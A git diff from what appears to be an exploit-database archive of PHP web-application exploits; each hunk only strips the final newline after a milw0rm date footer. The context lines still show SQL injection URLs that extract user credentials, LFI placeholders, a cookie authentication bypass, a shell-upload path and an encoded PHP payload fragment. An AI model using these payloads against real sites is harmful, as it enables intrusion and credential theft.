[2008-12-08] \ No newline at end of file diff --git a/platforms/php/webapps/7380.txt b/platforms/php/webapps/7380.txt index 4cd0b8331..2aa32291d 100755 --- a/platforms/php/webapps/7380.txt +++ b/platforms/php/webapps/7380.txt @@ -83,4 +83,4 @@ Digital Security is leading IT security company in Russia, providing information Contact: research [at] dsec [dot] ru http://www.dsec.ru (in Russian) -# milw0rm.com [2008-12-08] +# milw0rm.com [2008-12-08] \ No newline at end of file diff --git a/platforms/php/webapps/7381.txt b/platforms/php/webapps/7381.txt index 032a5fcdd..09324f6d0 100755 --- a/platforms/php/webapps/7381.txt +++ b/platforms/php/webapps/7381.txt @@ -209,4 +209,4 @@ for l in range(1, maxsize + 1): sys.stdout.write('\n') # EOF -# milw0rm.com [2008-12-08] +# milw0rm.com [2008-12-08] \ No newline at end of file diff --git a/platforms/php/webapps/7382.txt b/platforms/php/webapps/7382.txt index 9e1fb35b1..da1ed7cdc 100755 --- a/platforms/php/webapps/7382.txt +++ b/platforms/php/webapps/7382.txt @@ -182,4 +182,4 @@ reference, however this function doesn't use that variable reference. Again this is superstitious because it has no effect on the code its self. -# milw0rm.com [2008-12-08] +# milw0rm.com [2008-12-08] \ No newline at end of file diff --git a/platforms/php/webapps/7383.txt b/platforms/php/webapps/7383.txt index 032de1c87..668a51e90 100755 --- a/platforms/php/webapps/7383.txt +++ b/platforms/php/webapps/7383.txt @@ -35,4 +35,4 @@ Simple Directory Listing 2 - Cross Site File Upload -# milw0rm.com [2008-12-08] +# milw0rm.com [2008-12-08] \ No newline at end of file diff --git a/platforms/php/webapps/7385.txt b/platforms/php/webapps/7385.txt index 04528eb46..d6b4a8439 100755 --- a/platforms/php/webapps/7385.txt +++ b/platforms/php/webapps/7385.txt @@ -16,4 +16,4 @@ //Cn4phux. -# milw0rm.com [2008-12-08] +# milw0rm.com [2008-12-08] \ No newline at end of file diff --git a/platforms/php/webapps/7386.pl b/platforms/php/webapps/7386.pl index a8b630458..8fee183c2 100755 --- a/platforms/php/webapps/7386.pl +++ b/platforms/php/webapps/7386.pl @@ -68,4 +68,4 @@ for my $i(1..33) } } -# milw0rm.com [2008-12-08] +# milw0rm.com [2008-12-08] \ No newline at end of file diff --git a/platforms/php/webapps/7388.txt b/platforms/php/webapps/7388.txt index 018f95e17..1cf3ffa32 100755 --- a/platforms/php/webapps/7388.txt +++ b/platforms/php/webapps/7388.txt @@ -83,4 +83,4 @@ ******************************************************************************************* -# milw0rm.com [2008-12-08] +# milw0rm.com [2008-12-08] \ No newline at end of file diff --git a/platforms/php/webapps/7392.txt b/platforms/php/webapps/7392.txt index 5d2b60017..e8d12e23a 100755 --- a/platforms/php/webapps/7392.txt +++ b/platforms/php/webapps/7392.txt @@ -37,4 +37,4 @@ http://www.z0rlu.blogspot.com/script/_conf/core/common-tpl-vars.php?lang=[LFi] [~] [~]---------------------------------------------------------------------- -# milw0rm.com [2008-12-09] +# milw0rm.com [2008-12-09] \ No newline at end of file diff --git a/platforms/php/webapps/7395.txt b/platforms/php/webapps/7395.txt index d9077ca0b..8876ada43 100755 --- a/platforms/php/webapps/7395.txt +++ b/platforms/php/webapps/7395.txt @@ -20,4 +20,4 @@ ---------------------------------------------------------------------------------------------------------------------- SooN sub-z3ro.com -# milw0rm.com [2008-12-09] +# milw0rm.com [2008-12-09] \ No newline at end of file diff --git a/platforms/php/webapps/7396.txt b/platforms/php/webapps/7396.txt index 6dcf19a08..bb5290aec 100755 --- a/platforms/php/webapps/7396.txt +++ b/platforms/php/webapps/7396.txt @@ -20,4 +20,4 @@ ---------------------------------------------------------------------------------------------------------------------- sub-z3ro.com sOoN -# milw0rm.com [2008-12-09] +# milw0rm.com [2008-12-09] \ No newline at end of file diff --git a/platforms/php/webapps/7397.txt b/platforms/php/webapps/7397.txt index a37982ea7..9a76cb3df 100755 --- a/platforms/php/webapps/7397.txt +++ b/platforms/php/webapps/7397.txt @@ -29,4 +29,4 @@ Password : anything ---------------------------------------------------------------------------------------------------------------------------------------------------------------- -# milw0rm.com [2008-12-09] +# milw0rm.com [2008-12-09] \ No newline at end of file diff --git a/platforms/php/webapps/7399.txt b/platforms/php/webapps/7399.txt index 4d41d95b7..c9b64930d 100755 --- a/platforms/php/webapps/7399.txt +++ b/platforms/php/webapps/7399.txt @@ -27,4 +27,4 @@ Not: Tüm İslam Aleminin Kurban Bayramı Mobarek Olsun ***************************************************************************************** -# milw0rm.com [2008-12-09] +# milw0rm.com [2008-12-09] \ No newline at end of file diff --git a/platforms/php/webapps/740.pl b/platforms/php/webapps/740.pl index 78deab8f5..39c632bc3 100755 --- a/platforms/php/webapps/740.pl +++ b/platforms/php/webapps/740.pl @@ -72,4 +72,4 @@ $teste1 = ""; } } -# milw0rm.com [2005-01-04] +# milw0rm.com [2005-01-04] \ No newline at end of file diff --git a/platforms/php/webapps/7400.txt b/platforms/php/webapps/7400.txt index de5d127c8..7efb68c32 100755 --- a/platforms/php/webapps/7400.txt +++ b/platforms/php/webapps/7400.txt @@ -23,4 +23,4 @@ my mail: kivi_hacker666@yahoo.com *************************************************** -# milw0rm.com [2008-12-09] +# milw0rm.com [2008-12-09] \ No newline at end of file diff --git a/platforms/php/webapps/7406.php b/platforms/php/webapps/7406.php index dcbc3ee46..492173535 100755 --- a/platforms/php/webapps/7406.php +++ b/platforms/php/webapps/7406.php @@ -120,4 +120,4 @@ else ?> -# milw0rm.com [2008-12-10] +# milw0rm.com [2008-12-10] \ No newline at end of file diff --git a/platforms/php/webapps/7407.txt b/platforms/php/webapps/7407.txt index fa4ff4a9b..bc653fc76 100755 --- a/platforms/php/webapps/7407.txt +++ b/platforms/php/webapps/7407.txt @@ -42,4 +42,4 @@ ____________________________( Greetz )_________________________________ IM IraQi | IM TrYaGi -# milw0rm.com [2008-12-10] +# milw0rm.com [2008-12-10] \ No newline at end of file diff --git a/platforms/php/webapps/7408.txt b/platforms/php/webapps/7408.txt index 14953f971..62cc308fd 100755 --- a/platforms/php/webapps/7408.txt +++ b/platforms/php/webapps/7408.txt @@ -45,4 +45,4 @@ acIlan sayfada logonun ustunde sag tIkla ozellikleri Týkla linki kopyala sonr Thanks: str0ke - ÇılgınTurk -# milw0rm.com [2008-12-10] +# milw0rm.com [2008-12-10] \ No newline at end of file diff --git a/platforms/php/webapps/7409.txt b/platforms/php/webapps/7409.txt index 9758370d7..466f8324c 100755 --- a/platforms/php/webapps/7409.txt +++ b/platforms/php/webapps/7409.txt @@ -93,4 +93,4 @@ I'm not responsable for any damage caused... Pro Chat Rooms Version 3.0.2 (XSS/CSRF) Vulnerabilties ######################################################################### -# milw0rm.com [2008-12-10] +# milw0rm.com [2008-12-10] \ No newline at end of file diff --git a/platforms/php/webapps/7411.txt b/platforms/php/webapps/7411.txt index f0cc09efa..efa8a6b26 100755 --- a/platforms/php/webapps/7411.txt +++ b/platforms/php/webapps/7411.txt @@ -32,4 +32,4 @@ http://localhost/[path]/view.php?id=-1+union+select+0x49276d2076756c6e657261626c ######################################################################################## -# milw0rm.com [2008-12-10] +# milw0rm.com [2008-12-10] \ No newline at end of file diff --git a/platforms/php/webapps/7417.txt b/platforms/php/webapps/7417.txt index c71d39ea0..3f86f82e9 100755 --- a/platforms/php/webapps/7417.txt +++ b/platforms/php/webapps/7417.txt @@ -24,4 +24,4 @@ if ( $error_message || $error || !$_POST["submitval"] ) { #greetz Mi4night, zYzTeM, THE_MAN, Pepe, I-O-W-A, Digitalfortress, DiGitalX, sys32-hack, sys32r -# milw0rm.com [2008-12-10] +# milw0rm.com [2008-12-10] \ No newline at end of file diff --git a/platforms/php/webapps/7418.txt b/platforms/php/webapps/7418.txt index 321acfac5..fd5d57b51 100755 --- a/platforms/php/webapps/7418.txt +++ b/platforms/php/webapps/7418.txt @@ -36,4 +36,4 @@ Live Demo: http://www.phpaddedit.com/demo/ -------------------------------------- Greetz: Amore oggi +65 ti amo troppo. -# milw0rm.com [2008-12-11] +# milw0rm.com [2008-12-11] \ No newline at end of file diff --git a/platforms/php/webapps/7421.txt b/platforms/php/webapps/7421.txt index 25ccb3108..d694fcd08 100755 --- a/platforms/php/webapps/7421.txt +++ b/platforms/php/webapps/7421.txt @@ -23,4 +23,4 @@ https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/7421.zip (2008-eZPublish_abuse_of_functionality_zero_day.zip) -# milw0rm.com [2008-12-11] +# milw0rm.com [2008-12-11] \ No newline at end of file diff --git a/platforms/php/webapps/7422.txt b/platforms/php/webapps/7422.txt index 6ba7a58a3..99fa24cf4 100755 --- a/platforms/php/webapps/7422.txt +++ b/platforms/php/webapps/7422.txt @@ -26,4 +26,4 @@ http://[site]/FeedCms/?lang=[LFI] ^ ^ Greetz: A Te Che Mi Hai Cambiato La Vita... -# milw0rm.com [2008-12-11] +# milw0rm.com [2008-12-11] \ No newline at end of file diff --git a/platforms/php/webapps/7426.txt b/platforms/php/webapps/7426.txt index 378750e6c..6ef9b30b8 100755 --- a/platforms/php/webapps/7426.txt +++ b/platforms/php/webapps/7426.txt @@ -23,4 +23,4 @@ my mail: kivi_hacker666@yahoo.com *************************************************** -# milw0rm.com [2008-12-11] +# milw0rm.com [2008-12-11] \ No newline at end of file diff --git a/platforms/php/webapps/7430.txt b/platforms/php/webapps/7430.txt index e4f6e0b80..d40e3fdc8 100755 --- a/platforms/php/webapps/7430.txt +++ b/platforms/php/webapps/7430.txt @@ -74,4 +74,4 @@ ******************************************************************************************* -# milw0rm.com [2008-12-12] +# milw0rm.com [2008-12-12] \ No newline at end of file diff --git a/platforms/php/webapps/7432.txt b/platforms/php/webapps/7432.txt index a356ea194..5ce438cdb 100755 --- a/platforms/php/webapps/7432.txt +++ b/platforms/php/webapps/7432.txt @@ -30,4 +30,4 @@ Dork: " Powered by Xpoze " \> Str0ke Il pavimentosibillaLo z00I FoxHound ( goto www.myspace.com/foxhoundindie ) -# milw0rm.com [2008-12-12] +# milw0rm.com [2008-12-12] \ No newline at end of file diff --git a/platforms/php/webapps/7433.txt b/platforms/php/webapps/7433.txt index 2d42b191e..131ad4790 100755 --- a/platforms/php/webapps/7433.txt +++ b/platforms/php/webapps/7433.txt @@ -51,4 +51,4 @@ <<->> All freinds , all muslims , str0ke -# milw0rm.com [2008-12-12] +# milw0rm.com [2008-12-12] \ No newline at end of file diff --git a/platforms/php/webapps/7434.sh b/platforms/php/webapps/7434.sh index f75c38ee1..783e2680f 100755 --- a/platforms/php/webapps/7434.sh +++ b/platforms/php/webapps/7434.sh @@ -16,4 +16,4 @@ curl $host/$path > $name; clear cat $name; -# milw0rm.com [2008-12-12] +# milw0rm.com [2008-12-12] \ No newline at end of file diff --git a/platforms/php/webapps/7435.txt b/platforms/php/webapps/7435.txt index fa794993f..da03b264c 100755 --- a/platforms/php/webapps/7435.txt +++ b/platforms/php/webapps/7435.txt @@ -53,4 +53,4 @@ <<->> All freinds , all muslims , str0ke -# milw0rm.com [2008-12-12] +# milw0rm.com [2008-12-12] \ No newline at end of file diff --git a/platforms/php/webapps/7437.txt b/platforms/php/webapps/7437.txt index f7a243f14..3acb7d830 100755 --- a/platforms/php/webapps/7437.txt +++ b/platforms/php/webapps/7437.txt @@ -151,4 +151,4 @@ author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information. -# milw0rm.com [2008-12-12] +# milw0rm.com [2008-12-12] \ No newline at end of file diff --git a/platforms/php/webapps/7439.txt b/platforms/php/webapps/7439.txt index 889f005c3..c91293664 100755 --- a/platforms/php/webapps/7439.txt +++ b/platforms/php/webapps/7439.txt @@ -56,4 +56,4 @@ <<->> HCJ,Sniper_Net,broken security ,Cyb3r-1sT & all friends -# milw0rm.com [2008-12-12] +# milw0rm.com [2008-12-12] \ No newline at end of file diff --git a/platforms/php/webapps/7441.txt b/platforms/php/webapps/7441.txt index 20e66cdb8..ef3ad2b39 100755 --- a/platforms/php/webapps/7441.txt +++ b/platforms/php/webapps/7441.txt @@ -25,4 +25,4 @@ Open Proxy ( sends HTTP_FORWARDED ): administrator/components/com_livechat/xmlhttp.php?GET$01$2$3$4$5$http://www.google.com -# milw0rm.com [2008-12-12] +# milw0rm.com [2008-12-12] \ No newline at end of file diff --git a/platforms/php/webapps/7443.txt b/platforms/php/webapps/7443.txt index f60717246..615d0aa6c 100755 --- a/platforms/php/webapps/7443.txt +++ b/platforms/php/webapps/7443.txt @@ -38,4 +38,4 @@ $results = $db->select($sql); [/END] -# milw0rm.com [2008-12-14] +# milw0rm.com [2008-12-14] \ No newline at end of file diff --git a/platforms/php/webapps/7444.txt b/platforms/php/webapps/7444.txt index ac31fc7c9..27c58d225 100755 --- a/platforms/php/webapps/7444.txt +++ b/platforms/php/webapps/7444.txt @@ -66,4 +66,4 @@ this file is set in slogin_lib.inc.php. By default is: slog_users.txt [/END] -# milw0rm.com [2008-12-14] +# milw0rm.com [2008-12-14] \ No newline at end of file diff --git a/platforms/php/webapps/7448.txt b/platforms/php/webapps/7448.txt index 8ca617fae..420f7ec5b 100755 --- a/platforms/php/webapps/7448.txt +++ b/platforms/php/webapps/7448.txt @@ -57,4 +57,4 @@ following url : ############################################################################################ -# milw0rm.com [2008-12-14] +# milw0rm.com [2008-12-14] \ No newline at end of file diff --git a/platforms/php/webapps/7449.txt b/platforms/php/webapps/7449.txt index 237f32bc4..4d67ccb0b 100755 --- a/platforms/php/webapps/7449.txt +++ b/platforms/php/webapps/7449.txt @@ -18,4 +18,4 @@ # All Members Real-h.com and v4-team.net , All My Friends # #################################################################################################### -# milw0rm.com [2008-12-14] +# milw0rm.com [2008-12-14] \ No newline at end of file diff --git a/platforms/php/webapps/7451.txt b/platforms/php/webapps/7451.txt index 0d5864aa4..de20a17d0 100755 --- a/platforms/php/webapps/7451.txt +++ b/platforms/php/webapps/7451.txt @@ -26,4 +26,4 @@ Author: ahmadbady from:iran *************************************************** -# milw0rm.com [2008-12-14] +# milw0rm.com [2008-12-14] \ No newline at end of file diff --git a/platforms/php/webapps/7453.txt b/platforms/php/webapps/7453.txt index 4e6687544..8fd8b5c16 100755 --- a/platforms/php/webapps/7453.txt +++ b/platforms/php/webapps/7453.txt @@ -28,4 +28,4 @@ you can get the data of the injection in the url #greetz Mi4night, zYzTeM, THE_MAN, Pepe, I-O-W-A, Digitalfortress, DiGitalX, sys32-hack, sys32r, Whitestar -# milw0rm.com [2008-12-14] +# milw0rm.com [2008-12-14] \ No newline at end of file diff --git a/platforms/php/webapps/7455.txt b/platforms/php/webapps/7455.txt index 3925edb48..17c15412f 100755 --- a/platforms/php/webapps/7455.txt +++ b/platforms/php/webapps/7455.txt @@ -14,4 +14,4 @@ Exploit: http://[victim]/admin/download.php [ just a example ^^ ] -# milw0rm.com [2008-12-14] +# milw0rm.com [2008-12-14] \ No newline at end of file diff --git a/platforms/php/webapps/7456.txt b/platforms/php/webapps/7456.txt index c7eefb97e..ece6312c0 100755 --- a/platforms/php/webapps/7456.txt +++ b/platforms/php/webapps/7456.txt @@ -34,4 +34,4 @@ http://www.availscript.com/article_script/ Str0ke, All My Friends, Iranian Hackers & All Muslim -# milw0rm.com [2008-12-14] +# milw0rm.com [2008-12-14] \ No newline at end of file diff --git a/platforms/php/webapps/7457.txt b/platforms/php/webapps/7457.txt index d5acd4f8d..e4161bdd7 100755 --- a/platforms/php/webapps/7457.txt +++ b/platforms/php/webapps/7457.txt @@ -33,4 +33,4 @@ http://www.availscript.com/classmate/ Str0ke, All My Friends, Iranian Hackers & All Muslim -# milw0rm.com [2008-12-14] +# milw0rm.com [2008-12-14] \ No newline at end of file diff --git a/platforms/php/webapps/7458.txt b/platforms/php/webapps/7458.txt index 2a393e752..0d0275063 100755 --- a/platforms/php/webapps/7458.txt +++ b/platforms/php/webapps/7458.txt @@ -34,4 +34,4 @@ Bugged file is: /[path]/index.php [/END] -# milw0rm.com [2008-12-14] +# milw0rm.com [2008-12-14] \ No newline at end of file diff --git a/platforms/php/webapps/7459.txt b/platforms/php/webapps/7459.txt index 923630cea..c505b2bdc 100755 --- a/platforms/php/webapps/7459.txt +++ b/platforms/php/webapps/7459.txt @@ -18,4 +18,4 @@ Siyasetle ilgili biÅŸi söliyimmi :p FENERBAHÇEE (H) -# milw0rm.com [2008-12-14] +# milw0rm.com [2008-12-14] \ No newline at end of file diff --git a/platforms/php/webapps/7461.txt b/platforms/php/webapps/7461.txt index 93cb6ead3..023515593 100755 --- a/platforms/php/webapps/7461.txt +++ b/platforms/php/webapps/7461.txt @@ -39,4 +39,4 @@ fclose($fh); --> -# milw0rm.com [2008-12-14] +# milw0rm.com [2008-12-14] \ No newline at end of file diff --git a/platforms/php/webapps/7463.txt b/platforms/php/webapps/7463.txt index d46a53408..dd80408f7 100755 --- a/platforms/php/webapps/7463.txt +++ b/platforms/php/webapps/7463.txt @@ -26,4 +26,4 @@ http://www.aspsiteware.com/auto2/auto2/type.asp?iType=4+union+select+1,2,3,4,5,6 ########################################################################### -# milw0rm.com [2008-12-14] +# milw0rm.com [2008-12-14] \ No newline at end of file diff --git a/platforms/php/webapps/7465.txt b/platforms/php/webapps/7465.txt index 55f4d33ec..c90501e53 100755 --- a/platforms/php/webapps/7465.txt +++ b/platforms/php/webapps/7465.txt @@ -36,4 +36,4 @@ or another vuln Page: \>Str0keFuck you 007 hackerSecuritycode teamAll italian hackers -# milw0rm.com [2008-12-15] +# milw0rm.com [2008-12-15] \ No newline at end of file diff --git a/platforms/php/webapps/7474.txt b/platforms/php/webapps/7474.txt index 192fd3581..4dac96b57 100755 --- a/platforms/php/webapps/7474.txt +++ b/platforms/php/webapps/7474.txt @@ -21,4 +21,4 @@ Script is full of bugs like this, too bored to catch em all ! #greetz Mi4night, zYzTeM, THE_MAN, Pepe, I-O-W-A, Digitalfortress, DiGitalX, sys32-hack, sys32r, Whitestar -# milw0rm.com [2008-12-15] +# milw0rm.com [2008-12-15] \ No newline at end of file diff --git a/platforms/php/webapps/7475.txt b/platforms/php/webapps/7475.txt index 5ada1cf5e..4d8940244 100755 --- a/platforms/php/webapps/7475.txt +++ b/platforms/php/webapps/7475.txt @@ -76,4 +76,4 @@ http://127.0.0.1/[path]index.php?page=admin&act=members&func=delete&id=4 ############################################################################################ -# milw0rm.com [2008-12-15] +# milw0rm.com [2008-12-15] \ No newline at end of file diff --git a/platforms/php/webapps/7476.txt b/platforms/php/webapps/7476.txt index 1bd6cd757..e7873670e 100755 --- a/platforms/php/webapps/7476.txt +++ b/platforms/php/webapps/7476.txt @@ -75,4 +75,4 @@ sub usage exit; } -# milw0rm.com [2008-12-15] +# milw0rm.com [2008-12-15] \ No newline at end of file diff --git a/platforms/php/webapps/7478.txt b/platforms/php/webapps/7478.txt index af3a55117..fe08ed96b 100755 --- a/platforms/php/webapps/7478.txt +++ b/platforms/php/webapps/7478.txt @@ -16,4 +16,4 @@ Exploit: ' or '1=1 ^^ Got Root? -# milw0rm.com [2008-12-15] +# milw0rm.com [2008-12-15] \ No newline at end of file diff --git a/platforms/php/webapps/7479.txt b/platforms/php/webapps/7479.txt index 2c6b2cab8..1b2f6e0e6 100755 --- a/platforms/php/webapps/7479.txt +++ b/platforms/php/webapps/7479.txt @@ -21,4 +21,4 @@ Sql code: -98/**/union/**/select/**/1,2,3,4,uname,pass,7,8,9,10,11,12,13,14,15,1 live link: http://xxx.com/modules/amevents/print.php?id=-98/**/union/**/select/**/1,2,3,4,uname,pass,7,8,9,10,11,12,13,14,15,16/**/from/**/xoops_users/* -# milw0rm.com [2008-12-15] +# milw0rm.com [2008-12-15] \ No newline at end of file diff --git a/platforms/php/webapps/7480.txt b/platforms/php/webapps/7480.txt index 18ef9fc5d..ff987fa02 100755 --- a/platforms/php/webapps/7480.txt +++ b/platforms/php/webapps/7480.txt @@ -14,4 +14,4 @@ # Admin Panel : http://cadenix.com/demo/admin #################### Greetz :: Abo Mohamed ##################### -# milw0rm.com [2008-12-15] +# milw0rm.com [2008-12-15] \ No newline at end of file diff --git a/platforms/php/webapps/7481.txt b/platforms/php/webapps/7481.txt index 1da6c45dc..296f62244 100755 --- a/platforms/php/webapps/7481.txt +++ b/platforms/php/webapps/7481.txt @@ -46,4 +46,4 @@ and passoword. username:md5_hash [/END] -# milw0rm.com [2008-12-15] +# milw0rm.com [2008-12-15] \ No newline at end of file diff --git a/platforms/php/webapps/7482.txt b/platforms/php/webapps/7482.txt index 35ec34c6c..cf4a9f146 100755 --- a/platforms/php/webapps/7482.txt +++ b/platforms/php/webapps/7482.txt @@ -77,4 +77,4 @@ =========================================================================================================== -# milw0rm.com [2008-12-15] +# milw0rm.com [2008-12-15] \ No newline at end of file diff --git a/platforms/php/webapps/7483.txt b/platforms/php/webapps/7483.txt index fee6dba7c..683f292d8 100755 --- a/platforms/php/webapps/7483.txt +++ b/platforms/php/webapps/7483.txt @@ -27,4 +27,4 @@ thanks: str0ke a.q kpss -# milw0rm.com [2008-12-15] +# milw0rm.com [2008-12-15] \ No newline at end of file diff --git a/platforms/php/webapps/7487.txt b/platforms/php/webapps/7487.txt index b089bcc29..9f512ca74 100755 --- a/platforms/php/webapps/7487.txt +++ b/platforms/php/webapps/7487.txt @@ -27,4 +27,4 @@ For Contact : ZAC003[at]Y![dot]Com , Aria-Security.net(Forum And Best WebBase Ha SpTnX : Aria-Security Team , Emperor Hacking Team , Iranian WhiteHat Nomads Group greets : M3hd!.h4ckCity And All Member of Aria-Security -# milw0rm.com [2008-12-16] +# milw0rm.com [2008-12-16] \ No newline at end of file diff --git a/platforms/php/webapps/7489.pl b/platforms/php/webapps/7489.pl index 5130b0f38..479181bcb 100755 --- a/platforms/php/webapps/7489.pl +++ b/platforms/php/webapps/7489.pl @@ -43,4 +43,4 @@ else { __END__ -# milw0rm.com [2008-12-16] +# milw0rm.com [2008-12-16] \ No newline at end of file diff --git a/platforms/php/webapps/7490.php b/platforms/php/webapps/7490.php index 7b03d78b2..065d8c89c 100755 --- a/platforms/php/webapps/7490.php +++ b/platforms/php/webapps/7490.php @@ -113,4 +113,4 @@ } ?> -# milw0rm.com [2008-12-16] +# milw0rm.com [2008-12-16] \ No newline at end of file diff --git a/platforms/php/webapps/7493.txt b/platforms/php/webapps/7493.txt index a78156ab8..4911d6042 100755 --- a/platforms/php/webapps/7493.txt +++ b/platforms/php/webapps/7493.txt @@ -28,4 +28,4 @@ example : https://www.bauer.uh.edu/helpdesk/db/helpdesk2000.mdb http://www.ags2.com/helpdesk/db/helpdesk2000.mdb -# milw0rm.com [2008-12-16] +# milw0rm.com [2008-12-16] \ No newline at end of file diff --git a/platforms/php/webapps/7494.txt b/platforms/php/webapps/7494.txt index f42bae492..a073393d5 100755 --- a/platforms/php/webapps/7494.txt +++ b/platforms/php/webapps/7494.txt @@ -63,4 +63,4 @@ http://joineazy.com/members/member_pictures/shell.asp [~] [~]---------------------------------------------------------------------- -# milw0rm.com [2008-12-16] +# milw0rm.com [2008-12-16] \ No newline at end of file diff --git a/platforms/php/webapps/7497.txt b/platforms/php/webapps/7497.txt index 6aa10db52..4ba4ecfff 100755 --- a/platforms/php/webapps/7497.txt +++ b/platforms/php/webapps/7497.txt @@ -93,4 +93,4 @@ There are two bugged file. ######################################################################################### [/END] -# milw0rm.com [2008-12-17] +# milw0rm.com [2008-12-17] \ No newline at end of file diff --git a/platforms/php/webapps/7500.txt b/platforms/php/webapps/7500.txt index 7ecb79269..d32b03779 100755 --- a/platforms/php/webapps/7500.txt +++ b/platforms/php/webapps/7500.txt @@ -28,4 +28,4 @@ Attention: Shell Code İn GIF89;a ## web Site: www.rootingforced.org || www.rootingforced.com || www.rootingforced.net -# milw0rm.com [2008-12-17] +# milw0rm.com [2008-12-17] \ No newline at end of file diff --git a/platforms/php/webapps/7502.txt b/platforms/php/webapps/7502.txt index d1b3ca579..c5be9d72f 100755 --- a/platforms/php/webapps/7502.txt +++ b/platforms/php/webapps/7502.txt @@ -29,4 +29,4 @@ http://xxx/index.php?id=1+union+select+1,2,3,4,5,concat(username,0x3a,userpasswo http://xxx/referenzdetail.php?id=-6+union+select+1,2,3,4,5,6,concat(username,0x3a,userpassword),8,9,10,11+from+rcms_user/* http://xxx/produkte.php?id=-2+union+select+1,2,3,4,5,6,7,8,concat(username,0x3a,userpassword),10,11+from+rcmsv2_user/* -# milw0rm.com [2008-12-17] +# milw0rm.com [2008-12-17] \ No newline at end of file diff --git a/platforms/php/webapps/7504.txt b/platforms/php/webapps/7504.txt index c58d6c0aa..92dce230a 100755 --- a/platforms/php/webapps/7504.txt +++ b/platforms/php/webapps/7504.txt @@ -50,4 +50,4 @@ side note: 1.0.1 Tech Article Component For Joomla -# milw0rm.com [2008-12-17] +# milw0rm.com [2008-12-17] \ No newline at end of file diff --git a/platforms/php/webapps/7506.txt b/platforms/php/webapps/7506.txt index 97f2ecda4..ef923b1f6 100755 --- a/platforms/php/webapps/7506.txt +++ b/platforms/php/webapps/7506.txt @@ -34,4 +34,4 @@ ** **************************************************************** -# milw0rm.com [2008-12-17] +# milw0rm.com [2008-12-17] \ No newline at end of file diff --git a/platforms/php/webapps/7507.pl b/platforms/php/webapps/7507.pl index 7540be36b..b06961fa6 100755 --- a/platforms/php/webapps/7507.pl +++ b/platforms/php/webapps/7507.pl @@ -76,4 +76,4 @@ sub usage exit; } -# milw0rm.com [2008-12-17] +# milw0rm.com [2008-12-17] \ No newline at end of file diff --git a/platforms/php/webapps/7509.txt b/platforms/php/webapps/7509.txt index f1ba149ce..35dca3c27 100755 --- a/platforms/php/webapps/7509.txt +++ b/platforms/php/webapps/7509.txt @@ -20,4 +20,4 @@ Save and upload ! http://pouya2006.persiangig.com/UploadVideo/minifile.rar --------------------------------- -# milw0rm.com [2008-12-18] +# milw0rm.com [2008-12-18] \ No newline at end of file diff --git a/platforms/php/webapps/7510.txt b/platforms/php/webapps/7510.txt index 91af668b2..c53bbf027 100755 --- a/platforms/php/webapps/7510.txt +++ b/platforms/php/webapps/7510.txt @@ -92,4 +92,4 @@ a php shell ? [/END] -# milw0rm.com [2008-12-18] +# milw0rm.com [2008-12-18] \ No newline at end of file diff --git a/platforms/php/webapps/7511.txt b/platforms/php/webapps/7511.txt index f58691b3a..55b9ef065 100755 --- a/platforms/php/webapps/7511.txt +++ b/platforms/php/webapps/7511.txt @@ -27,4 +27,4 @@ * ------------------------------------------------------------------------------------------------ */ -# milw0rm.com [2008-12-18] +# milw0rm.com [2008-12-18] \ No newline at end of file diff --git a/platforms/php/webapps/7512.php b/platforms/php/webapps/7512.php index 68c56981e..0c9003602 100755 --- a/platforms/php/webapps/7512.php +++ b/platforms/php/webapps/7512.php @@ -92,4 +92,4 @@ Usage: php xpl.php [host/path] [command] ?> -# milw0rm.com [2008-12-18] +# milw0rm.com [2008-12-18] \ No newline at end of file diff --git a/platforms/php/webapps/7513.txt b/platforms/php/webapps/7513.txt index 118a9bba9..770a66a8c 100755 --- a/platforms/php/webapps/7513.txt +++ b/platforms/php/webapps/7513.txt @@ -50,4 +50,4 @@ if(mysql_num_rows($checkDetails) > 0) { [/END] -# milw0rm.com [2008-12-18] +# milw0rm.com [2008-12-18] \ No newline at end of file diff --git a/platforms/php/webapps/7514.txt b/platforms/php/webapps/7514.txt index 666bbef3e..74eaf25de 100755 --- a/platforms/php/webapps/7514.txt +++ b/platforms/php/webapps/7514.txt @@ -37,4 +37,4 @@ To see the information go View Sources/Search "large.php?id=" ;). #[!] United States of Albania ############################## -# milw0rm.com [2008-12-18] +# milw0rm.com [2008-12-18] \ No newline at end of file diff --git a/platforms/php/webapps/7515.txt b/platforms/php/webapps/7515.txt index aaf6627f8..4574c39fd 100755 --- a/platforms/php/webapps/7515.txt +++ b/platforms/php/webapps/7515.txt @@ -49,4 +49,4 @@ Examples of vulnerable files: /index.php?page='> etc -# milw0rm.com [2008-12-18] +# milw0rm.com [2008-12-18] \ No newline at end of file diff --git a/platforms/php/webapps/7517.txt b/platforms/php/webapps/7517.txt index a74d071f1..2a524dfea 100755 --- a/platforms/php/webapps/7517.txt +++ b/platforms/php/webapps/7517.txt @@ -27,4 +27,4 @@ Public disclosure: Dec 18 - Seasons Greetings - - http://nukeit.org - -# milw0rm.com [2008-12-18] +# milw0rm.com [2008-12-18] \ No newline at end of file diff --git a/platforms/php/webapps/7518.txt b/platforms/php/webapps/7518.txt index e108f35d1..06a7012b6 100755 --- a/platforms/php/webapps/7518.txt +++ b/platforms/php/webapps/7518.txt @@ -34,4 +34,4 @@ javascript:document.cookie = "auth=ok; path=/"; then \admin\menu.php # So Easy T Greetz: Amore Mio Sei La Mia Stella Che Mi Illumina Qua Giù...Ti AmO -# milw0rm.com [2008-12-18] +# milw0rm.com [2008-12-18] \ No newline at end of file diff --git a/platforms/php/webapps/7519.txt b/platforms/php/webapps/7519.txt index 6dd8f4c3e..3f4bf908c 100755 --- a/platforms/php/webapps/7519.txt +++ b/platforms/php/webapps/7519.txt @@ -23,4 +23,4 @@ # ################################################################ -# milw0rm.com [2008-12-18] +# milw0rm.com [2008-12-18] \ No newline at end of file diff --git a/platforms/php/webapps/7522.pl b/platforms/php/webapps/7522.pl index 8b84622eb..5863da1ac 100755 --- a/platforms/php/webapps/7522.pl +++ b/platforms/php/webapps/7522.pl @@ -106,4 +106,4 @@ close(OUT); #EOF -# milw0rm.com [2008-12-19] +# milw0rm.com [2008-12-19] \ No newline at end of file diff --git a/platforms/php/webapps/7523.php b/platforms/php/webapps/7523.php index 51cf68d1e..ec62716d4 100755 --- a/platforms/php/webapps/7523.php +++ b/platforms/php/webapps/7523.php @@ -155,4 +155,4 @@ $GNK = "aWYgKGlzc2V0KCRfUE9TVFsnZ29fR05LJ10pICYmIGlzc2V0KCRfUE9TVFsidXJpX0dOSyJd 